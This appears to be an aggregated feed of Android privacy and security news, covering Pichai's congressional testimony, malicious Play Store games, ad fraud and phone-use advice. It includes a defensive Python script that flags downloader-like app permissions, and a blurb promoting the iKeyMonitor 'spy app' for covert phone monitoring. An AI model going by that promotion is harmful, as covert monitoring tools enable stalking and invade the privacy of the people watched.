An anonymous reader quotes a report from TechCrunch: Google CEO Sundar Pichai thinks Android users have a good understanding of the volume of data Google collects on them, when they agree to use the Android mobile operating system. The exec, who is testifying today in front of the House Judiciary committee for a hearing entitled "Transparency & Accountability: Examining Google and its Data Collection, Use and Filtering Practices," claimed that users are in control of the information Google has on them. "For Google services, you have a choice of what information is collected, and we make it transparent," Pichai said in response to questioning from Chairman of the House Judiciary Committee Rep. Bob Goodlatte (R-VA). Google's defense on the data collection front is similar to Facebook's -- that is, Pichai responded that Google provides tools that put users in control. But do they actually use them? "It's really important for us that average users are able to understand it," said Pichai, stating that users do understand the user agreement for Android OS. "We actually ... remind users to do a privacy checkup, and we make it very obvious every month. In fact, in the last 28 days, 160 million users went to their My Account settings, where they can clearly see what information we have -- we actually show it back to them. We give clear toggles, by category, where they can decide whether that information is collected, stored, or -- more importantly -- if they decide to stop using it, we work hard to make it possible for users to take their data with them," he said. When asked if Google could improve its user dashboard and tools to better teach people how to protect their privacy, including turning off data collection and location tracking, Pichai said "there's complexity," but it is "something I do think we can do better." He continued: "We want to simplify it, and make it easier for average users to navigate these settings. It's something we are working on."

Read more of this story at Slashdot.

Apps on smartphones are selling and sharing our location data 24/7

By Waqas

It’s no surprise that the apps we download on our smartphones are tracking our movements and also transferring the information to third parties without our consent. Last year it was Google caught collecting location data of Android users even if their device’s location service was off then the Gay dating app Grindr, Facebook and the fitness app by […]

This is a post from HackRead.com Read the original post: Apps on smartphones are selling and sharing our location data 24/7

5G and cybersecurity

Keeping you safe in an increasingly connected world

If you’ve upgraded your smartphone in the last few years, there’s a very good chance your handset supports 4G mobile networks. 4G, short for ‘fourth generation’, offers super-fast data download speeds allowing you to stream more video, share larger high-resolution pictures and to browse the web more quickly.

But even these speeds are not enough to keep pace with demand. Everything is getting bigger – 4K video file sizes are enormous, and augmented reality animations are bandwidth hungry.

There is a second issue that needs to be addressed too – the sheer number of wireless devices connecting to mobile networks. Smart devices are an increasingly important part of modern life, at home and in the workplace.

We need more bandwidth and faster connectivity to deal with the changing demands on mobile networks. We are already outgrowing the possibilities of 4G networking.

Welcome to 5G networking

The good news is that the fifth generation (5G) of mobile network technologies has been designed and is undergoing testing. Mobile operators across the world are in the advanced stages of planning how these systems will be rolled out to consumers and businesses in the UK and beyond.

The introduction of 5G technologies will allow us to do more than ever before with our devices – but it also highlights a serious challenge. More and more devices are being connected to mobile networks, and each represents a potential security risk.

Smart sensors used in factories allow manufacturers to monitor assembly lines in real time for instance. But if poorly configured, or insufficiently secured, these devices could be used to hack into the company network to steal other data.

Other devices, like self-driving cars are completely reliant on mobile network connections to work properly. These vehicles are permanently connected, uploading and downloading data to the cloud to make split second decisions. If these decisions are interrupted – by hackers breaking through the network security for instance – the car could be involved in an accident, perhaps even killing people in the process.

More security required

With more devices connected to mobile networks, the need for security increases. Every single device needs to be protected against cyberattack, which means that security systems need to be present everywhere.

To cope with the increasing number of devices, security systems will also have to get smarter. Artificial intelligence will become more important, monitoring network activity to identify and block suspicious behaviour automatically. This approach is quicker and more effective than traditional IT security provisions, especially as the security software does not necessarily have to be installed on each device.

Play your part

Businesses will have to take care of their own smart sensors, but consumers need to get involved. The increased number of devices and network traffic presents a risk to you too – so you must ensure your smartphone is properly protected.

Even if you don’t have a 5G connection, you can take steps to protect yourself now. Download and install a free copy of Panda Security Antivirus for Android today and you’ll be fully prepared to overcome the future challenges of next generation mobile networks.

The post 5G and cybersecurity appeared first on Panda Security Mediacenter.

22 malware infected apps on Play Store found draining phone’s battery

By Waqas

Another day, another malware targeting Android users – This time, 22 apps have been removed from the Play Store after security researchers found malware draining user phone’s battery and also downloading files without their consent. These Android apps disguised themselves as legitimate software and in some cases even offered some functionality. The most popular of […]

This is a post from HackRead.com Read the original post: 22 malware infected apps on Play Store found draining phone’s battery

Google Play Services Drops Support For Android Ice Cream Sandwich

Google is pulling support for Android 4.0 Ice Cream Sandwich more than seven years after it was first introduced. The company announced in a blog post that Google Play services will no longer provide updates for the APIs (14 and 15) used by applications running on ICS. VentureBeat reports: Ice Cream Sandwich (ICS), as Android 4.0 to 4.0.4 is more affectionately known, was a landmark operating system in many ways, ushering in a whole new set of interface guidelines -- with a more minimalist design, not to mention groundbreaking features such as near-field communication (NFC), lockscreen support for camera and music controls, and facial recognition smarts for unlocking devices. App developers who currently offer minimum support of API level 16 (Android 4.1 Jelly Bean) and over won't have to do anything as a result of these changes. However, if their apps currently support API level 14 or 15, they will encounter a build error when updating to a newer SDK version. Google is now recommending that all developers target API level 16 as the bare minimum, which means those still using Ice Cream Sandwich on their Android device won't even see the app update in Google Play, let alone be able to download it.

Read more of this story at Slashdot.

Click fraud with profit optimisation: Android apps disguise themselves as iPhone programs

Maximising profit is one of the guiding principles of every cybercriminal. So it is no surprise that SophosLabs has now uncovered a new scheme that relies on the fact that advertisers pay more per click when it appears to come from supposedly wealthier iPhone or iPad owners. Since so-called click fraud, in which commercial ad placements are clicked or clicks are used to manipulate the […]

Google Is Shutting Down Its Allo Messaging App, Says Report

According to 9to5Google, citing a source familiar with the plan, Google will "soon" announce that it will be shutting down its Google Allo messaging app. "This development comes almost 8 months after Anil Sabharwal, Vice President of Chrome, Comms and Photos at Google, said that the company was 'pausing investment' in Google Allo," reports 9to5Google. It also comes less than a week after 9to5Google reported that Google will be shutting down Google Hangouts for consumers sometime in 2020. Google may delay the news about Allo due to the backlash stemming from the article about Hangouts. From the report: Lately, some of the app's remaining users have complained of bugs and broken functionality: there have been messages not being delivered, features like hearting posts randomly disappearing for some, and the latest stable version has been unable to perform Google Drive restores of chats for several weeks. Meanwhile, essentially the entire Allo team was moved to work on Android Messages and spent the last several months porting over much of Allo's features and functionality -- all leading up to the recent beginnings of evidence that the rollout of Google's RCS 'Chat' initiative is gaining traction.

Read more of this story at Slashdot.

Google Hangouts For Consumers Will Be Shutting Down Sometime In 2020

According to 9to5Google, Google Hangouts for consumers will be shutting down sometime in 2020. The news shouldn't come as too much of a surprise since Google essentially stopped development on the app more than a year ago. Thankfully, there are plenty of other Google messaging apps available, such as Allo, Duo, and Android Messages. From the report: Last spring, Google announced its pivot for the Hangouts brand to enterprise use cases with Hangouts Chat and Hangouts Meet, so the writing has been on the wall for quite some time regarding the Hangouts consumer app's demise. Meanwhile, Google has transitioned its consumer-facing messaging efforts to RCS 'Chat' and Android Messages following Allo's misadventures. As mentioned, Hangouts as a brand will live on with G Suite's Hangouts Chat and Hangouts Meet, the former intended to be a team communication app comparable to Slack, and the latter a video meetings platform. Meanwhile, Google Voice calling, which was at first independent and then long integrated into Hangouts, was moved back out to its own redesigned app earlier this year. Interestingly, despite its forthcoming axing, Hangouts was one of a few apps to get early support for Android Auto's new MMS and RCS functionality, alongside Android Messages and WhatsApp.

Read more of this story at Slashdot.

How To Stop Ads On Android Home Screen

Tired of ads in your Android web browser, or of the pop-up and notification ads showing up on your Android home screen?

In this article we cover the easiest ways to block ads on Android.


Here is how to easily block Ads on Android Home Screen

1. Use of Opera Web Browser


The Opera web browser can get rid of browser ads on its own. All you need to do is download the browser from the official Google Play Store.

Install it and you are good to go.

The reason is simple: Opera has a free, built-in ad blocker that stops unwanted ads from loading and so spares you a bad browsing experience.

Download Opera


2. Installing free ad-blocker Browser

If you do not like Opera and want a different option, this one is for you.

The free Adblock Browser works on the same principle as Opera and is made by the same company as the well-known Adblock Plus desktop extension.

Download Adblock Browser 


3. Blocking Pop-up Ads in Chrome


If you would rather not install anything on your device, you can block pop-ups in Chrome itself.

Blocking pop-up ads in Chrome is one of the simplest ways to get rid of the most irritating ads.

Ways to Turn it on

  • Launch the browser and tap on the three dots at the top right of the screen
  • Then choose Settings, Site Settings
  • And Scroll down to Pop-ups and make sure the slider is set to Blocked.

4. Use of Data Saver Mode

If you love Chrome and have decided to stick with it, you can also turn on Data Saver mode.

Data Saver is not an ad blocker, but it does reduce ads as a side effect.

It loads pages through Google's compression servers, which shrink or drop heavy page content, so some pop-ups and banners never make it to the screen. Bear in mind that this also means your non-HTTPS browsing is routed through Google's servers while it is on.

Ways to Turn on the Data Saver mode

  • Just open the Chrome
  • Hit the three dots menu icon in the top righthand corner
  • Find settings
  • Then Data Saver mode
  • And turn it On.

Also, Read – What Is Android System WebView: How To Enable And Use IT?


Conclusion

That covers the main ways to block ads on Android. If you found it helpful, let us know in the comment section below; we would love to hear from you.

Stay tuned for more.

The post How To Stop Ads On Android Home Screen appeared first on TechWorm.

Android System WebView: How To Enable And Use IT?

Android is perhaps the most popular smartphone OS with more than two billion active users. This highly customizable smartphone OS has dozens of hidden features and Android System WebView is one among them.

So here's everything you need to know about the often overlooked Android System WebView.

ALSO READ: Google confirms Dark Mode on Android smartphones improves battery life


What Is Android System Webview

Android System WebView is a system component powered by Chrome that allows Android apps to display web content.

Earlier, applications like Facebook relied on external browsers for opening links on the platform. Android System WebView solves the above-mentioned issue by functioning as an in-app browser.

In simple words, Android System WebView can be thought of as a stripped-down Chrome that comes pre-installed on every Android smartphone. It lets other applications load a URL without the user leaving the application.

Google regularly releases updates for Android System WebView. Because WebView renders untrusted web content inside other apps, these updates carry security fixes that matter, not just compatibility improvements.

Also Read- 10 best Android Apps of 2018


Do You Need Android System WebView

Android System WebView is an important component and an integral part of Android. That said, it can be disabled, and its updates uninstalled, if a user wants to.

Android System WebView became a stand-alone application, updated through Google Play, with Android 5.0 (Lollipop). With Android 7.0 (Nougat), Google itself disabled the stand-alone Android System WebView application on devices where Chrome is installed and enabled.

Google did this because Chrome can provide the WebView implementation instead. Using Chrome as the WebView provider is more efficient, since it avoids shipping and updating two copies of the same browser engine, which saves storage and some battery.

Consequently, if you are on Android N or above with Chrome enabled, the stand-alone Android System WebView app is normally already disabled and you can leave it that way. On older Android versions, keep it enabled and updated: apps depend on it for in-app web content, and its updates deliver the security fixes.

Also Read- How To Stop Ads On Android Home Screen

So this was some basic information about an unnoticed yet nifty feature on Android OS.

Do let us know in the comments if there is anything about Android System WebView that we should add to this article.

The post Android System WebView: How To Enable And Use IT? appeared first on TechWorm.

Popular Android apps on Play Store caught defrauding users

By Waqas

A well-known Chinese app developer Cheetah Mobile and one of its subsidiaries Kika Tech might have claimed credit for millions of dollars from advertisers through an Android fraud scheme, reveals app analytics firm Kochava. It is a common practice for mobile app developers to generate revenue by marketing for new apps inside their apps for […]

This is a post from HackRead.com Read the original post: Popular Android apps on Play Store caught defrauding users

A week in security (November 19 – 25)

Last week on Malwarebytes Labs, we took a look at a devastating business email compromise attack, web skimming antics, and the fresh perils of Deepfakes. We also checked out some Chrome bug issues, and took the deepest of deep dives into DNA testing.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 19 – 25) appeared first on Malwarebytes Labs.

Security Affairs: 13 fraudulent apps in Google Play have been downloaded 560,000+ times

A malware researcher discovered 13 fraudulent apps in Google Play that had already been downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps in Google Play that had already been downloaded and installed over half a million times (560,000+).

The malicious apps allow attackers to install another app and trick the user into granting the permissions necessary for that installation.

All the malicious apps pose as games and were published by the same developer, named Luis O Pinto; at the time of discovery they had a low detection rate.

The cybercriminals aim to monetise their efforts by pushing unsolicited advertisements to the user when the device is unlocked.

Once installed, the malicious apps immediately remove their icon from the launcher and download other malicious apps in the background.

The additional applications were all downloaded from a hardcoded address.

To trick users into granting the permissions needed to install the downloaded app, the malicious apps make the user believe that the installation failed and restarted, asking the user to approve the action again.

Stefanko reported that the downloaded APK was called Game Center; once installed and executed it hides itself and starts displaying ads.

The expert pointed out that Game Center requests permissions for full network access, to view network and Wi-Fi connections, and to run at startup.

The malicious apps implement no real functionality of their own; they work as simple downloaders, which is how they passed Google Play's security checks.

Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.
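The permission set and boot-time persistence Stefanko describes can be checked mechanically against a decoded manifest. The script below is an added example, not code from ESET or Security Affairs. The mapping from the Play Store's permission wording ("full network access", "view network connections", "run at startup") to manifest permission names is an assumption; REQUEST_INSTALL_PACKAGES goes beyond what the article states, since it is what an app on Android 8+ must declare before it can start an APK install; and the two manifests at the bottom are constructed for the example, not taken from the real apps.

```python
"""Manifest triage for the downloader pattern described above.

Added example, not code from ESET or Security Affairs. It takes the decoded
AndroidManifest.xml of an APK (as produced by `apktool d app.apk`, for
instance) and reports the permissions the article lists plus whether the
app is wired to run at boot. The two sample manifests at the bottom are
constructed for this example and do not correspond to real apps.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ANAME = "{%s}name" % ANDROID_NS  # attribute key for android:name

# Assumed mapping from the Play Store wording quoted in the article to the
# manifest permissions behind it. REQUEST_INSTALL_PACKAGES is an addition:
# on Android 8+ an app must declare it before it can start an APK install.
WATCHED = {
    "android.permission.INTERNET": "full network access",
    "android.permission.ACCESS_NETWORK_STATE": "view network connections",
    "android.permission.ACCESS_WIFI_STATE": "view Wi-Fi connections",
    "android.permission.RECEIVE_BOOT_COMPLETED": "run at startup",
    "android.permission.REQUEST_INSTALL_PACKAGES": "install packages (Android 8+)",
}
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"


def _has_filter(component, action, category=None):
    """True if any intent-filter on the component matches action (+category)."""
    for flt in component.iter("intent-filter"):
        actions = {a.get(ANAME) for a in flt.iter("action")}
        cats = {c.get(ANAME) for c in flt.iter("category")}
        if action in actions and (category is None or category in cats):
            return True
    return False


def parse_manifest(xml_text):
    """Extract package name, permissions, launcher activities and boot receivers."""
    root = ET.fromstring(xml_text)
    return {
        "package": root.get("package"),
        "permissions": {e.get(ANAME) for e in root.iter("uses-permission")},
        "launchers": [a.get(ANAME) for a in root.iter("activity")
                      if _has_filter(a, "android.intent.action.MAIN",
                                     "android.intent.category.LAUNCHER")],
        "boot_receivers": [r.get(ANAME) for r in root.iter("receiver")
                           if _has_filter(r, BOOT_ACTION)],
    }


def triage(xml_text):
    """Return the watched permissions present and a verdict string."""
    info = parse_manifest(xml_text)
    found = {p: WATCHED[p] for p in info["permissions"] if p in WATCHED}
    network = "android.permission.INTERNET" in found
    # "Run at startup" needs both the permission and a receiver for BOOT_COMPLETED.
    at_boot = ("android.permission.RECEIVE_BOOT_COMPLETED" in found
               and bool(info["boot_receivers"]))
    can_install = "android.permission.REQUEST_INSTALL_PACKAGES" in found
    if network and at_boot and can_install:
        verdict = "downloader-like, can install packages"
    elif network and at_boot:
        verdict = "downloader-like"
    else:
        verdict = "no downloader pattern"
    return {"package": info["package"], "found": found, "verdict": verdict}


# Constructed sample manifests for the example (not real apps).
BENIGN = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.puzzle">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name="com.example.puzzle.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

DOWNLOADER = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.trucksim">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application>
    <activity android:name="com.example.trucksim.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name="com.example.trucksim.BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    for manifest in (BENIGN, DOWNLOADER):
        print(triage(manifest))
```

Treat the verdict as a triage heuristic rather than a detection: plenty of legitimate apps use the network and register for BOOT_COMPLETED, so "downloader-like" is a reason to look in the decompiled code for a hardcoded download URL and an install intent, not a conviction. The icon hiding the article describes happens at runtime, through component enable/disable calls, and is not visible in the manifest at all.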

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)

The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.


13 Malware-Laden Fake Apps on Google Play

A security researcher used Twitter to warn users about malware embedded in fake apps available on Google Play. Lukas Stefanko, malware researcher at ESET, reported the malicious apps to

The post 13 Malware-Laden Fake Apps on Google Play appeared first on The Cyber Security Place.

13 malware gaming apps on Play Store installed by half a million users

By Waqas

Android is one of the most used mobile operating systems in the world and that makes it a lucrative target for malicious hackers. Recently, ESET’s IT security researcher Lukas Stefanko identified the presence of malware in 13 driving game apps on none other than the Google Play Store. What’s worse is that these apps were installed by more […]

This is a post from HackRead.com Read the original post: 13 malware gaming apps on Play Store installed by half a million users

Errors to avoid when downloading apps

There are literally millions of smartphone apps in existence, allowing you to do virtually anything from the palm of your hand. In fact, the humble smartphone has become the primary computing device for many people today.

The vast majority of these apps are perfectly safe, but there are bad apps out there. Apps that steal data, track your location without permission, or secretly share sensitive information with third parties for instance.

Worse still, these apps may look and act like the real thing, so you don’t even realise there’s a problem. So how can you avoid making the mistake of downloading a bad app?

Only use official app stores

For iPhone users, there is only one place to download apps – the official Apple App Store. Every app listed is checked by Apple to ensure that it is malware-free – and in most cases this process works very well.

Android users have a lot more choice – they can download and install software from any website or app store that they choose. But this flexibility brings an increased risk of installing a compromised app.

For this reason you should only ever download and install apps from official app stores like Google Play, the Amazon Appstore or the website of your handset manufacturer like Samsung. Each of these stores carry out checks on the quality and security of the apps available, offering a good degree of protection against malware.

You should never install apps from an unrecognised website. In fact, you should only install apps from one of these official, well-known app stores.

Ensure you have mobile anti-malware installed

As previously mentioned, most bad apps are very clever – the longer you have them installed, the more of your data they can steal. They will do everything possible to deflect attention so that you don’t notice there’s anything wrong.

It is possible to have malware installed on your phone for months – or maybe even years.

The biggest mistake most Android phone owners make is to leave their handset unprotected. Anti-malware, like Panda Mobile Security, can scan your smartphone for these bad apps and advise you that there is a problem. You then have early warning about malware – and the opportunity to delete it before your data is stolen.

You should also consider choosing a mobile security tool that uses a secure VPN service to protect your web traffic. A product like Panda Dome Advanced automatically blocks traffic to known compromised websites (and dodgy app stores), which reduces the chance of your data being stolen or of downloading a bad app by accident.

Be sensible

The biggest mistake most people make is to simply download and use apps without thinking. By not stopping to think about where an app came from, or to check that the app is safe before installation, people are creating serious problems for themselves.

The good news is that a comprehensive mobile security service adds a layer of additional protection for when you forget to check where an app came from.

The final mistake people make? Not taking immediate action. Click here to download free antivirus for Android now.

Download Panda Mobile Security

The post Errors to avoid when downloading apps appeared first on Panda Security Mediacenter.

500,000 Duped Into Downloading Android Malware Posing As Driving Games On Google Play

Be careful what you're downloading from Google Play. Especially if it's one of 13 apps posing as driving games created by one developer called Luiz Pinto. From a report: More than 560,000 have already been tricked into downloading the games, which include a mix of luxury car and truck simulation apps, as discovered by Android malware researcher Lukas Stefanko. Once installed on a user's Android device, the games don't actually work. Looking at the reviews on Google Play, users who downloaded them complained it was a virus. For instance, among the masses of one-star reviews for the Truck Cargo Simulator, one noted his device slowed down after it forced him to download an app that wasn't the game itself. Many simply called it a scam.

Read more of this story at Slashdot.

Police arrest alleged Russian hacker behind huge Android ad scam

Police in Bulgaria have arrested an alleged Russian hacker who may be responsible for a huge Android ad scam that netted $10 million. The individual identified as Alexander Zhukov is a Saint Petersburg native who's been living in Varna, Bulgaria, since 2010 and was apprehended on November 6th after the US issued an international warrant for his arrest, according to ZDNet.

Source: Kommersant

iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

By Carolina

Nowadays, it has become a social rule to own a smartphone, and humanity has become more dependent on social networks than ever before. We need to be connected to the Internet at all times and we publish our most private and personal thoughts there. Even in social events people spend their time constantly checking their […]

This is a post from HackRead.com Read the original post: iKeyMonitor Spy App for iPhone and Android: Best Remote Monitoring Tool

Mac Virus: Apple and Android updates 17th November 2018

Bleeping Computer: iPhone X, Galaxy S9, Xiaomi Mi6 Fall at Pwn2Own Tokyo – “iPhone X, Samsung Galaxy S9, and Xiaomi Mi6 all fell at the hands of hackers that found bugs in various components and crafted exploits that allowed complete take over of the targeted device.”


 for ESET: Google’s data charts path to avoiding malware on Android
“How much higher are the odds that your device will be exposed to malware if you download apps from outside Google Play or if you use one of Android’s older versions? Google has the numbers”


Cyberscoop: Apple’s new security chip kills access to microphone – “In a security pamphlet released after Apple’s press event on Tuesday, the company revealed that the chip will completely cut off access to the device’s microphone when the MacBook lid is shut.”


The Register: Android fans get fat November security patch bundle – if the networks or mobe makers are kind enough to let ’em have it – “And Apple fixes Watch-killing security patch of its own”


Graham Cluley for BitDefender: Yes, you should update your iPhone to iOS 12.1, but its lock screen is *still* unsafe

John E. Dunn for Sophos: Another day, another update, another iPhone lock screen bypass


Sophos: Update now! Apple releases security fixes for iOS, MacOS, Safari, others


Brian Krebs: Busting SIM Swappers and SIM Swap Myths – “KrebsOnSecurity recently had a chance to interview members of the REACT Task Force, a team of law enforcement officers and prosecutors based in Santa Clara, Calif. that has been tracking down individuals engaged in unauthorized “SIM swaps” — a complex form of mobile phone fraud that is often used to steal large amounts of cryptocurrencies and other items of value from victims.”

David Harley

Mac Virus

Gmail “From field” bug makes phishing attacks easier for hackers

By Waqas

Gmail, as we know, is a popular and commonly preferred email platform around the world. That’s why any news about a bug in this platform is bound to create chaos among users. And, that’s exactly the case this time. Software developer Tim Cotten has discovered a bug in Gmail’s ‘From:’ header structure that can allow the […]

This is a post from HackRead.com. Read the original post: Gmail “From field” bug makes phishing attacks easier for hackers

Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control

You aren’t going to like this post. However, you will, hopefully, find yourself nodding and perhaps even making some changes because of it. Here it is, friends: that love-hate relationship you have with your smartphone may need some serious attention — not tomorrow or next week — but now.

I’m lecturing myself first by the way. Thanks to the June iOS update that tracks and breaks down phone usage, I’m ready — eager in fact — to make some concrete changes to my digital habits. Why? Because the relationship with my phone – which by the way has become more like a third child — is costing me in time (75 days a year to be exact), stress, and personal goals.

I say this with much conviction because the numbers don’t lie. It’s official: I’m spending more time on my phone than I am with my kids. Likewise, the attention I give and the stress caused by my phone is equivalent to parenting another human. Sad, but true. Here’s the breakdown.

Screen time stats for the past seven days:

  • 5 hours per day on my device
  • 19 hours on social networks
  • 2 hours on productivity
  • 1 hour on creativity
  • 18 phone pickups a day; 2 pickups per hour

Do the math:

  • 35 hours a week on my device
  • 1,820 hours a year on my device
  • 75 days a year on my device

Those numbers are both accurate and disturbing. I’m not proud. Something’s gotta give and, as Michael Jackson once said, change needs to start with the man (woman) in the mirror.

A 2015 study by Pew Research Center found that 24% of Americans can’t stop checking their feeds constantly. No surprise, a handful of other studies confirm excessive phone use is linked to anxiety, depression, and a social phenomenon called FOMO, or Fear Of Missing Out.

Efficiency vs. Anxiety

There’s no argument around the benefits of technology. As parents, we can keep track of our kids’ whereabouts, filter their content, live in smart houses that are efficient and secure, and advance our skills and knowledge at lightning speeds.

That’s a lot of conveniences wrapped in even more pings, alerts, and notifications that can cause anxiety, sleeplessness, and stress. In our hyper-connected culture, it’s not surprising to see this behavior in yourself or the people in your social circles:

  • Nervousness or anxiety when you are not able to check your notifications.
  • An overwhelming need to share things — photos, personal thoughts, stresses — with others on social media.
  • Withdrawal symptoms when you are not able to access social media.
  • Interrupting conversations to check social media accounts.
  • Lying (downplaying) to others about how much time you spend on social media sites.

We often promote balance in technology use, but this post will go one step further. This post will get uncomfortably specific in suggesting things to do to put a dent in your screen time. (Again, these suggested changes are aimed at this mom first.)

Get Intentional

  • Look at your stats. A lot of people don’t go to the doctor or dentist because they claim “not knowing” about an ailment is less stressful than knowing. Don’t take that approach to your screen time. Make today the day you take a hard look at reality. Both iOS and Android now have screen time tracking.
  • Get reinforcements. There are a lot of apps out there like Your Hour, AppBlock, Stay Focused, Flipd, and App Off Timer designed to help curb your smartphone usage. Check out the one(s) that fit your needs and best help you control your screen time.
  • Plan your week. If you have activities planned ahead of time for the week — like a hike, reading, a movie, or spending time with friends — you are less likely to fritter away hours on your phone.
  • Leave your phone at home. Just a decade ago we spent full days away from home running errands, visiting friends, and exploring the outdoors — all without our phones. The world kept turning. Nothing fell to pieces. So start small. Go to the grocery store without your phone. Next, have dinner with friends. Then, go on a full day excursion. Wean yourself off your device and reclaim your days and strengthen your relationships.
  • Establish/enforce phone-free family zones. Modeling control in your phone use helps your kids to do the same. Establish phone-free zones such as homework time, the dinner table, family activities, and bedtime. The key here is that once you establish the phone-free zones, be sure to enforce them. A lot of parents (me included) get lax after a while in this area. Research products that allow you to set rules and time limits for apps and websites. McAfee Safe Family helps you establish limits with pre-defined age-based rules that can be customized based on your family’s needs.
  • Delete unused apps. Give this a try: Delete one social app at a time, for just a day or a week, to see if you need it. If you end up keeping even one time-wasting app off your phone, the change will be well worth it.
  • Engage with people over your phone. If you are in the line at the grocery store, waiting for a show to begin, or hanging out at your child’s school/ sports events, seek to connect with people rather than pull out your phone. Do this intentionally for a week, and it may become a habit!
  • Do one thing at a time. A lot of wasted device time happens because we are multi-tasking — and that time adds up. So if you are watching a movie, reading, or even doing housework, put your phone in another room — in a drawer. Try training yourself to focus on doing one thing at a time.
  • Give yourself a phone curfew. We’ve talked about phone curfews for kids to help them get enough sleep but how about one for parents? Pick a time that works for you and stick to it. (I’m choosing to put my phone away at 8 p.m. every night.)
  • Use a voice recorder, notes app, or text. Spending too much time uploading random content? Curb your urge to check or post on social media by speaking your thoughts into your voice recorder app. Likewise, pin that article or post that photo to your notes to catalog it in a meaningful way, or text/share it with a small group of people. These few changes could save you many hours on social sites.
  • Turn off notifications. You can’t help but look at those notifications so change your habitual response by turning off all notifications.
  • Limit, don’t quit. Moderation is key to making changes stick. Try limiting your social media time to 10 minutes a day. Choose a time that works and set a timer if you need to. There’s no need to sever all ties with social media; just keep it in its proper place.

Slow but Specific Changes

Lastly, go at change slowly (but specifically) and give yourself some grace. Change isn’t easy. You didn’t rack up those screen time stats overnight. You’ve come to rely on your phone for a lot of tasks as well as entertainment. So, there’s no need to approach this as a life overhaul, a digital detox, or take an everything or nothing approach. Nor is there a need to trumpet your social departure to your online communities. Just take a look at your reality and do what you need to do to take back your time and control that unruly third child once and for all. You’ve got this!

The post Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control appeared first on McAfee Blogs.

Mid-Range Google ‘Pixel 3 Lite’ Leaks With Snapdragon 670, Headphone Jack

The first alleged images of the rumored "budget" Pixel 3 have been leaked. The Pixel 3 Lite, as it is being called, looks very similar to the Pixel 3, although it features a plastic build construction, slower processor, and a headphone jack. 9to5Google reports: Just like the standard Pixel 3, there's a display that's roughly 5.56-inches in size, but this time it's an IPS LCD panel at 2220x1080 rather than an OLED panel. Obviously, there's also no notch to be seen on this alleged Pixel 3 Lite. There's a single front-facing camera as well as one speaker above that display, relatively thick bezels on the top and bottom, and a speaker along the bottom of the device as well. Perhaps most interesting when it comes to the hardware, though, is that there's a headphone jack on the top of the phone. That's certainly unexpected since the Pixel 2 dropped the jack and Google hasn't looked back since. Tests from Rozetked reveal some of the specifications running this device as well. That includes a Snapdragon 670 chipset, 4GB of RAM, and 32GB of storage. Previous reports have pointed to a Snapdragon 710. Battery capacity on this device is also reported at 2915 mAh and there's a USB-C port along the bottom. It is rumored to include the same 12MP and 8MP cameras found in the standard Pixel 3 and Pixel 3 XL, which will be a huge selling point for the affordable phone market. The price is expected to be around $400-500.

Read more of this story at Slashdot.

Mark Zuckerberg Reportedly Ordered All Facebook Executives To Use Android Phones After Tim Cook Criticized Facebook

A new report from the New York Times sheds some light on what happened inside Facebook last year as the company was fighting numerous scandals, including Russian interference and the Cambridge Analytica scandal in March. In addition to reportedly hiring a public relations firm to write dozens of articles critical of rivals Google and Apple, the social media company ordered Facebook executives to use Android phones, after Apple CEO Tim Cook criticized the company in an MSNBC interview for being a service that traffics "in your personal life." According to the report, the order came from Facebook CEO Mark Zuckerberg. The Verge reports: In those comments made back in March, Cook dismissed a question asking him what he would do if he were in Zuckerberg's shoes dealing with the fallout from the Cambridge Analytica scandal by saying, "I wouldn't be in this situation." Zuckerberg soon after retorted in an interview with Recode that he found Cook's comments to be "extremely glib," and that "I think it's important that we don't all get Stockholm syndrome and let the companies that work hard to charge you more convince you that they actually care more about you. Because that sounds ridiculous to me." While it's not clear how Cook's aggressive comments directly provoked Zuckerberg into issuing his Android-only order, it's still a rational decision to make Americans use Android. Android is the dominant operating system in many regions outside of the U.S., including South America, Europe, Russia, South Asia, and parts of the Middle East.

Read more of this story at Slashdot.

Android Ecosystem Security Transparency Report is a wary first step

Reading through Google’s first quarterly Android Ecosystem Security Transparency Report feels like a mix of missed opportunities and déjà vu all over again.

Much of what is in the new Android ecosystem security report is data that has been part of Google’s annual Android Security Year in Review report, including the rates of potentially harmful applications (PHAs) on devices with and without sideloaded apps — spoiler alert: sideloading is much riskier — and rates of PHAs by geographical region. Surprisingly, the rates in Russia are lower than in the U.S.

The only other data in the Android ecosystem security report shows the percentage of devices with at least one PHA installed, broken down by Android version. This new data shows that the newer the version of Android, the less likely it is that a device will have a PHA installed.

However, this also hints at the data Google didn’t include in the report, like how well specific hardware partners have done in updating devices to those newer versions of Android. Considering that Android 7.x Nougat is the most common version of the OS in the wild at 28.2% and the latest version 9.0 Pie hasn’t even cracked the 0.1% marker to be included in Google’s platform numbers, the smart money says OEM updating stats wouldn’t be too impressive.

